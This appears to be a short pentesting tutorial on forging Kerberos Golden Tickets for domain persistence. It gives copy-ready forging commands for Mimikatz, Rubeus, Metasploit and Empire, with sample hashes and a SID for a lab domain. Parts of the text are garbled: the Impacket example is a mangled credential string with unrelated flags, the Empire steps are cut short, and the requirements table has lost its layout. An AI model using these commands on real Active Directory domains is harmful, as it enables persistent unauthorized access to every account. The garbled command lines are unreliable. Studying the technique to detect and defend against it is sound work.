Kerberos Golden Tickets
Domain Persistence with Kerberos Golden Ticket attack.
Table of contents
- Understanding the Golden Ticket Attack
- Requirements to forge a Golden Ticket
- List of Tools
A Golden Ticket attack is a post-exploitation technique that involves creating a forged Kerberos Ticket-Granting Ticket (TGT) to gain unauthorized access to a network. This attack typically requires compromising the security of a Key Distribution Center (KDC) or domain controller.
ATT&CK ID: T1558.001
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as golden tickets. Golden tickets enable adversaries to generate authentication material for any account in the Active Directory.
Understanding the Golden Ticket Attack
Golden Ticket attack exploits vulnerabilities within the Kerberos authentication protocol, which is a fundamental component of AD used for user authentication and authorization.
By manipulating Kerberos tickets, attackers or security professionals gain unauthorized and persistent access to a network, allowing them to move laterally across critical systems and resources.
Requirements to forge a Golden Ticket
After an initial compromise happens an attacker tries to escalate privileges to an Administrator account
|Remember to remove the RID at the end of SID
|KRBTGT NTLM / AES256 Hash
List of Tools
How to Create Golden Tickets with MimiKatz?
mimikatz kerberos::golden /domain:poplabsec.rfs /sid:<string> /user:Administrator /krbtgt:<NTLM Hash> /ptt
How to Create Golden Tickets with Rubeus?
rubeus.exe hash /user:rfs /domain:poplabsec.rfs /password:Password@1
rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ldap /user:rfs /printcmd
How to Create Golden Tickets with Impacket?
administrator:Paa@email@example.com -outputfile krb -user-status
How to Create Golden Tickets with Metasploit?
golden_ticket_create -d poplabsec.rfs -u rfs -s S-1-5-21-3523557010-2506964455-2614950430 -k f3bc61e97fb14d18c42bcbf6c3a9055f -t /root/Desktop/ticket.kirbi
How to Create Golden Tickets with Empire?
set user rfs
set id 500
Golden Tickets Time
10 years by default